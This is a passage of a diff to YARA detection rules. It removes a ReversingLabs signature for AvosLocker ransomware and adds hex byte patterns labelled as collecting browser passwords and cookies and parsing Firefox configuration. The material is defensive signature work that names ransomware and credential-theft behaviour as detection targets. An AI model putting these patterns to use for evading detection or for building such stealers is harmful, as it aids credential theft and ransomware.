?? ?? [1-10] FF (35 | 75) [1-4] 6A ?? - 6A ?? 6A ?? FF 35 ?? ?? ?? ?? (E8 | FF 15) ?? - ?? ?? ?? 0B C0 75 ?? (EB | E9) [1-4] 6A ?? - [2-10] FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 - ?? 75 ?? [10-40] FF (35 | 75) [1-4] FF 75 ?? - (E8 |FF 15) + $parse_firefox_configuration_p3 = { + 4C 8B 7D ?? 49 8B C4 49 2B C7 48 83 F8 ?? 0F 82 ?? ?? ?? ?? 4C 8D 65 ?? 48 83 7D ?? + ?? 4C 0F 47 65 ?? 4C 89 6C 24 ?? 0F 57 C0 0F 11 44 24 ?? 0F 57 C9 F3 0F 7F 4D ?? 4D + 8D 77 ?? BB ?? ?? ?? ?? 48 8D 7C 24 ?? 48 8D 44 24 ?? 48 89 85 ?? ?? ?? ?? 8D 4B ?? + E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 89 08 4C 89 68 ?? 48 89 44 24 + ?? 4C 3B F3 76 ?? 49 8B DE 48 83 CB ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 3B D8 76 ?? + 48 8B D8 EB ?? 48 83 FB ?? B8 ?? ?? ?? ?? 48 0F 42 D8 48 8D 4B ?? E8 ?? ?? ?? ?? 48 + 8B F8 48 89 44 24 ?? 4C 89 75 ?? 48 89 5D ?? 4D 8B C7 49 8B D4 48 8B CF E8 ?? ?? ?? + ?? 42 C7 04 3F ?? ?? ?? ?? 42 C6 04 37 ?? C7 44 24 ?? ?? ?? ?? ?? 48 8B 05 ?? ?? ?? + ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? FF D0 4C 8B 75 ?? 48 8B 5D ?? 49 + 3B DE 0F 84 ?? ?? ?? ?? 48 83 C3 ?? 0F 1F 40 ?? 48 8D 43 ?? 48 8D 4D ?? 48 3B C8 74 + ?? 48 8B D3 48 83 7B ?? ?? 76 ?? 48 8B 13 4C 8B 43 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 + 8D 53 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? + ?? 49 C7 C0 ?? ?? ?? ?? 0F 1F 40 ?? 49 FF C0 42 80 3C 00 ?? 75 ?? 48 8B D0 48 8D 4D + ?? E8 ?? ?? ?? ?? 48 8D 53 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? + 48 8B C8 E8 ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 0F 1F 44 00 ?? 49 FF C0 42 80 3C 00 ?? + 75 ?? 48 8B D0 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 7E ?? 48 3B 7E ?? 74 ?? 48 + 89 BD ?? ?? ?? ?? 48 8D 55 ?? 48 8B CF E8 ?? ?? ?? ?? 90 48 8D 4F ?? 48 8D 55 ?? E8 + ?? ?? ?? ?? 90 48 8D 4F ?? 48 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 56 ?? 4C 8B + C2 48 8B CE E8 ?? ?? ?? ?? 48 83 46 ?? ?? EB ?? 4C 8D 45 ?? 48 8B D7 48 8B CE E8 ?? + ?? ?? ?? 48 83 C3 ?? 48 8D 43 ?? 49 3B C6 0F 85 ?? ?? ?? ?? 48 8D 4C 24 } - - condition: - uint16(0)==0x5A4D and (($read_config_file and $file_type_loop and $encrypt_routine) or ($enum_drives and $enum_shared_resources and $find_files and $encrypt_files)) -} -rule REVERSINGLABS_Win32_Ransomware_Avoslocker : TC_DETECTION MALICIOUS MALWARE FILE -{ - meta: - description = "Yara rule that detects AvosLocker ransomware." - author = "ReversingLabs" - id = "a803283d-6424-5a64-89e6-c73a3322ba1e" - date = "2021-10-22" - modified = "2021-10-22" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.AvosLocker.yara#L1-L108" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4d81b801a95a54a35989c4a985d92578971568d1412f625bca911d0fa1eee1fe" - score = 75 - quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "AvosLocker" - tc_detection_factor = 5 - importance = 25 - - strings: - $find_files = { - 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF - B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 - 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? - 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 - C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9 - ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 - C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 - ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ?? - ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ?? 74 ?? - FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15 + $collect_browser_passwords_p1 = { + 48 89 5C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? + ?? ?? ?? 0F 29 B4 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? + 48 63 DA 48 8B F9 48 89 4D ?? C7 44 24 ?? ?? ?? ?? ?? 0F 57 C0 0F 11 01 0F 11 41 ?? + 45 33 ED 4C 89 29 4C 89 69 ?? 4C 89 69 ?? 4C 89 69 ?? 41 8D 4D ?? E8 ?? ?? ?? ?? 4C + 89 68 ?? 48 89 07 48 89 38 C7 44 24 ?? ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 + 8D 0C 9B 4C 8D 05 ?? ?? ?? ?? 49 8D 50 ?? 48 8D 14 CA 49 83 7C C8 ?? ?? 76 ?? 48 8B + 12 4D 8B 44 C8 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D0 48 8D 4D ?? E8 ?? ?? ?? ?? C7 44 + 24 ?? ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 + 48 8B 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 12 00 F3 0F 7F 45 ?? C6 45 + ?? ?? 48 8B 4D ?? 4C 89 6D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? + ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 8B CB E8 ?? + ?? ?? ?? 4C 8B E0 4C 89 6D ?? 4C 89 6D ?? 0F 57 C0 0F 11 45 ?? 0F 57 C9 F3 0F 7F 4D + ?? 41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 4C 89 6D ?? + 48 8D 4D ?? 48 83 7D ?? ?? 48 0F 47 4D ?? 48 8D 55 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? + 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D8 48 8B 4D ?? FF 15 + ?? ?? ?? ?? 48 8B D0 48 8B CB E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? + 48 8D 55 ?? 48 83 7D ?? ?? 48 0F 47 55 ?? 4C 89 6C 24 ?? 4C 8D 4D ?? 41 B8 ?? ?? ?? + ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8B 4D ?? + FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 33 D2 48 8B + 4D ?? FF 15 ?? ?? ?? ?? 4C 8B F8 BA ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B } - $enum_resources = { - 50 51 6A ?? 6A ?? 6A ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? - ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? 57 - E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 57 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 - 0F 85 ?? ?? ?? ?? 33 DB 39 5D ?? 76 ?? 8D 77 ?? 83 7E ?? ?? 0F 85 ?? ?? ?? ?? 83 7E - ?? ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 85 - ?? ?? ?? ?? 39 46 ?? B9 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 8B D1 0F 45 56 ?? 8B C1 83 - 7E ?? ?? 0F 11 85 ?? ?? ?? ?? 0F 45 46 ?? 83 3E ?? 0F 28 05 ?? ?? ?? ?? 89 45 ?? 8B - C1 0F 45 06 83 7E ?? ?? 0F 11 45 ?? 89 45 ?? 8B C1 0F 28 05 ?? ?? ?? ?? 0F 45 46 ?? - 33 C9 0F 11 45 ?? 89 45 ?? 0F 28 05 ?? ?? ?? ?? 0F 11 45 ?? 8A 85 ?? ?? ?? ?? 30 84 - 0D ?? ?? ?? ?? 41 83 F9 ?? 72 ?? 52 FF 75 ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? FF 75 ?? - FF 75 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 3E ?? 0F 84 ?? ?? ?? ?? FF 36 E8 ?? ?? ?? ?? - 59 83 F8 ?? 0F 86 ?? ?? ?? ?? 8B 06 80 78 ?? ?? 75 ?? B1 ?? C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? 33 C0 66 C7 45 ?? ?? ?? C6 45 ?? ?? 30 4C 05 ?? 40 83 F8 ?? 73 ?? - 8A 4D ?? EB ?? 8D 45 ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 59 FF 36 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 65 ?? ?? 50 51 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? - C6 45 ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 83 4D ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? EB ?? B1 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? - C6 45 ?? ?? 30 4C 05 ?? 40 83 F8 ?? 73 ?? 8A 4D ?? EB ?? 8D 45 ?? C6 45 ?? ?? 50 E8 - ?? ?? ?? ?? 59 F7 46 ?? ?? ?? ?? ?? 74 ?? 8D 4E ?? E8 ?? ?? ?? ?? 43 83 C6 ?? 3B 5D - ?? 0F 82 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF 75 ?? FF 15 + $collect_browser_passwords_p2 = { + F0 BA ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 4C 8B F0 BA ?? ?? ?? ?? 48 8B 4D ?? + FF 15 ?? ?? ?? ?? 48 8B D8 BA ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? BA ?? ?? ?? + ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 C7 C0 ?? ?? ?? ?? + 48 FF C0 80 3C 03 ?? 75 ?? 48 83 F8 ?? 0F 86 ?? ?? ?? ?? 41 0F 10 34 24 4C 89 6C 24 + ?? 0F 57 C0 0F 11 44 24 ?? 4C 89 6C 24 ?? 4C 89 6C 24 ?? 49 C7 C0 ?? ?? ?? ?? 66 0F + 1F 44 00 ?? 49 FF C0 42 80 3C 03 ?? 75 ?? 48 8B D3 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 0F + 29 74 24 ?? 4C 8D 44 24 ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? + ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 49 8B D7 E8 ?? ?? ?? ?? 48 8B + C8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 + 48 8B D6 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 48 8B C8 49 8B D6 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D + 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 55 ?? 48 83 7D ?? ?? 48 0F + 47 55 ?? 4C 8B 45 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? + ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 49 FF C0 42 80 3C 06 ?? 75 ?? 48 8B D6 48 8D 4D ?? E8 + ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 49 FF C0 43 80 3C 06 ?? 75 ?? 49 8B D6 48 8D 4D ?? + E8 ?? ?? ?? ?? 48 8D 55 ?? 48 83 7D ?? ?? 48 0F 47 55 ?? 4C 8B 45 ?? 48 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 48 8B 5F ?? 48 3B 5F ?? 74 ?? 48 89 5C 24 ?? 48 8D 55 ?? 48 8B } - $import_key = { - 50 53 53 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 - 0F 85 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 50 68 ?? ?? - ?? ?? FF D6 50 53 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B1 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B C3 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 30 8C 05 ?? ?? - ?? ?? 40 83 F8 ?? 73 ?? 8A 8D ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 88 9D ?? ?? ?? ?? - 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 59 0F 11 85 ?? ?? ?? ?? - 59 0F 28 05 ?? ?? ?? ?? 8B CB 0F 11 85 ?? ?? ?? ?? 66 C7 85 ?? ?? ?? ?? ?? ?? 88 9D - ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 30 84 0D ?? ?? ?? ?? 41 83 F9 ?? 72 ?? 88 9D ?? ?? ?? - ?? FF D6 50 8D 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF 36 8D 45 ?? 89 9D ?? ?? ?? ?? 50 E8 - ?? ?? ?? ?? FF 76 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 8D ?? - ?? ?? ?? 83 C4 ?? 8B D7 50 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? - 84 C0 75 ?? 0F 28 05 ?? ?? ?? ?? 8B CB 0F 11 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? 0F 28 05 ?? ?? ?? ?? 0F 11 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 C7 - 85 ?? ?? ?? ?? ?? ?? 88 9D ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 30 84 0D ?? ?? ?? ?? 41 83 - F9 ?? 72 ?? 8D 85 ?? ?? ?? ?? 88 9D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D 45 ?? 50 E8 - ?? ?? ?? ?? 59 8D 4D ?? 85 C0 74 ?? 88 19 41 83 E8 ?? 75 ?? 39 9D ?? ?? ?? ?? 74 ?? - FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 + $collect_browser_passwords_p3 = { + CB E8 ?? ?? ?? ?? 90 48 8D 4B ?? 48 8D 55 ?? E8 ?? ?? ?? ?? 90 48 8D 4B ?? 48 8D 95 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 57 ?? 4C 8B C2 48 8B CF E8 ?? ?? ?? ?? 48 83 47 + ?? ?? EB ?? 4C 8D 45 ?? 48 8B D3 48 8B CF E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? + ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C + 89 6D ?? 48 C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 48 8B 4D ?? 4C 89 6D ?? BA ?? ?? ?? ?? + E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 83 F8 ?? + 0F 84 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? 49 8B CC E8 ?? ?? ?? + ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 55 ?? + 48 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 12 00 48 8B 4D ?? F3 0F 7F 45 ?? C6 45 + ?? ?? 4C 89 6D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B + 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 + ?? ?? 12 00 48 8B 4D ?? F3 0F 7F 45 ?? C6 45 ?? ?? 4C 89 6D ?? BA ?? ?? ?? ?? E8 ?? + ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B + 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 12 00 48 8B 4D ?? F3 0F 7F 45 ?? + C6 45 ?? ?? 4C 89 6D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B C7 48 8B 8D ?? ?? ?? + ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 0F 28 B4 24 ?? ?? ?? ?? 48 81 C4 + ?? ?? ?? ?? 41 5F 41 5E 41 5D 41 5C 5F 5E 5D C3 } - $encrypt_files = { - 50 51 51 FF B5 ?? ?? ?? ?? 51 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? - ?? ?? 8B BD ?? ?? ?? ?? 57 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 59 85 F6 0F 84 ?? - ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CE 85 C0 74 ?? C6 01 ?? 41 83 E8 ?? 75 ?? 8D 85 ?? ?? - ?? ?? 50 E8 ?? ?? ?? ?? 59 83 C0 ?? 74 ?? 39 85 ?? ?? ?? ?? 72 ?? 50 8D 85 ?? ?? ?? - ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? FF B5 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 - C4 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? - ?? ?? 59 57 40 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 6A ?? FF B5 ?? ?? ?? ?? 6A - ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? D1 EF 6A ?? 5A 74 ?? - 8B 9D ?? ?? ?? ?? 4B 03 DE 8A 03 8A 0C 32 88 04 32 42 88 0B 4B 3B D7 72 ?? 8B 9D ?? - ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 03 C3 56 50 E8 ?? ?? ?? ?? 03 DF 56 - 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? - ?? 47 81 C6 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 50 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 - B9 ?? ?? ?? ?? F7 F1 83 C4 ?? 40 3B F8 0F 82 + $collect_cookies_p1 = { + 48 89 5C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? + ?? ?? ?? 0F 29 B4 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? + 48 63 DA 4C 8B F1 48 89 4D ?? C7 44 24 ?? ?? ?? ?? ?? 0F 57 C0 0F 11 01 0F 11 41 ?? + 33 FF 48 89 39 48 89 79 ?? 48 89 79 ?? 48 89 79 ?? 8D 4F ?? E8 ?? ?? ?? ?? 48 89 78 + ?? 49 89 06 4C 89 30 C7 44 24 ?? ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 0C + 9B 4C 8D 05 ?? ?? ?? ?? 49 8D 50 ?? 48 8D 14 CA 49 83 7C C8 ?? ?? 76 ?? 48 8B 12 4D + 8B 44 C8 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D0 48 8D 4D ?? E8 ?? ?? ?? ?? C7 44 24 ?? + ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B + 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 12 00 F3 0F 7F 45 ?? C6 45 ?? ?? + 48 8B 4D ?? 48 89 7D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? + 84 C0 0F 84 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 7D ?? 48 89 7D ?? + 0F 57 C0 0F 11 45 ?? 0F 57 C9 F3 0F 7F 4D ?? 41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? + 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 89 7D ?? 48 8D 4D ?? 48 83 7D ?? ?? 48 0F 47 4D ?? + 48 8D 55 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? + E8 ?? ?? ?? ?? 48 8B D8 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B D0 48 8B CB E8 ?? ?? ?? + ?? 48 8B C8 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 55 ?? 48 83 7D ?? ?? 48 0F 47 55 ?? + 48 89 7C 24 ?? 4C 8D 4D ?? 41 B8 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 85 C0 74 + ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? + ?? 0F 1F 80 ?? ?? ?? ?? 33 D2 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B F0 BA ?? ?? ?? ?? + 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B F8 BA ?? ?? ?? ?? 48 8B 4D ?? FF 15 + } + $collect_cookies_p2 = { + 4C 8B F8 BA ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B D8 BA ?? ?? ?? ?? 48 8B + 4D ?? FF 15 ?? ?? ?? ?? 4C 8B E0 BA ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 44 8B + E8 48 85 F6 75 ?? 48 85 FF 75 ?? 48 85 DB 0F 84 ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? ?? 48 + FF C1 80 3C 0E ?? 75 ?? 48 85 C9 75 ?? 48 C7 C0 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? + 48 FF C0 80 3C 07 ?? 75 ?? 48 85 C0 75 ?? 48 C7 C0 ?? ?? ?? ?? 48 FF C0 80 3C 03 ?? + 75 ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 45 85 ED 0F 8E ?? ?? + ?? ?? 48 C7 C0 ?? ?? ?? ?? 48 FF C0 80 3C 03 ?? 75 ?? 48 83 F8 ?? 0F 86 ?? ?? ?? ?? + 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 48 8B D6 E8 ?? ?? + ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 48 8B C8 48 8B D7 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 0F 10 30 + 45 33 ED 4C 89 6C 24 ?? 0F 57 C0 0F 11 44 24 ?? 4C 89 6C 24 ?? 4C 89 6C 24 ?? 49 C7 + C0 ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 49 FF C0 46 38 2C 03 75 ?? 48 8B D3 48 8D 4C 24 + ?? E8 ?? ?? ?? ?? 0F 29 74 24 ?? 4C 8D 44 24 ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? + ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 55 ?? 48 83 + 7D ?? ?? 48 0F 47 55 ?? 4C 8B 45 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? + 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 49 8B D7 E8 ?? ?? + ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 48 8B C8 49 8B D4 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 E8 + } + $collect_cookies_p3 = { + 49 C7 C0 ?? ?? ?? ?? 90 49 FF C0 42 80 3C 06 ?? 75 ?? 48 8B D6 48 8D 4D ?? E8 ?? ?? + ?? ?? 49 C7 C0 ?? ?? ?? ?? 0F 1F 00 49 FF C0 42 80 3C 07 ?? 75 ?? 48 8B D7 48 8D 4D + ?? E8 ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 0F 1F 00 49 FF C0 43 80 3C 07 ?? 75 ?? 49 8B + D7 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 49 FF C0 43 80 3C 04 ?? + 75 ?? 49 8B D4 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 55 ?? 48 83 7D ?? ?? 48 0F + 47 55 